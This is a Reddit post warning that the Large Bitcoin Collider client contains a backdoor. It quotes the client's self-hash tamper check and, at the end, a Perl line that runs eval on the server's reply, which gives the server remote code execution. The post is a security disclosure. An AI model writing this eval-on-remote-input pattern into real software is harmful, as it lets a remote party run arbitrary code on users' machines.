Do not run the Large Bitcoin Collider client, it’s probably malicious!

IT IS ACTUALLY MALICIOUS, DON'T RUN IT!

EDIT: I was originally going to retract that message, as the code seemed safe, but there's an actual backdoor allowing remote code execution! (see below).

You are probably assuming that I am one of the people who are thinking that LBC significantly undermines the safety of Bitcoin. No, I am not. I just discovered something very weird when running the executable, which seems to suggest of its malicious behavior.

When I ran the original script after reading the documentation, it constantly returned an error from the server and didn't run.

sopa@pc:~/LBC $   ./LBC Will use 2 CPUs. Ask for work... Server doesn't like us. Answer: wrong secret. 

It told me that the secret was wrong so I edited the script to print it out and that's where the shady stuff starts.

sopa@pc:~/LBC $   ./LBC-modified Will use 2 CPUs. Ask for work... Server doesn't like us. Answer: malformed request. 

Huh, a malformed request now?! Let's run it again.

sopa@pc:~/LBC $   ./LBC-modified Will use 2 CPUs. Ask for work... Server doesn't like us. Answer: challenge failed. 

I ran it multiple times and the error message was always different and it seemed like they were randomly picked from a list.

I thought that this is very strange, as the original script returned the same error all the time, when I discovered these lines in the LBC script:

local ( $  /, *FILE ) ; open FILE, $  file; my $  codeprint = md5_hex( <FILE> ) ; close FILE; return $  codeprint; } 

Notice the code style of this perl script. Seems like it was obfuscated (or just compacted so that it does not take a lot of disk space, which is not that bad).

What this piece of code does is taking an MD5 hash of the entire file. It then proceeds to submit that hash to the server with every request. This seems to verify that the file wasn't tampered with. There's also a death_kiss routine which prints "DEATH KISS" and exits. I have no idea what it's for, though.

There's over six thousand lines in this script and nobody really knows what do they actually do.

I request u/therico666 to explain the above and to publish the unobfuscated source code of the script.

Do not run the client executable on any important computers, it might contain a rootkit. Unless the author of the scripts explains the purpose of these functions, I don't recommend trusting it.

EDIT: corrected the username: rico666 -> therico666.

REMOTE CODE EXECUTION BACKDOOR

As noted by u/_jstanley, there's a line to evaluate the server's reply. Basically, this is remote code execution.

if ( defined $  answer -> {eval} ) { eval $  answer -> {eval} ; } 

submitted by /u/SopaXorzTaker
[link] [comments]
Bitcoin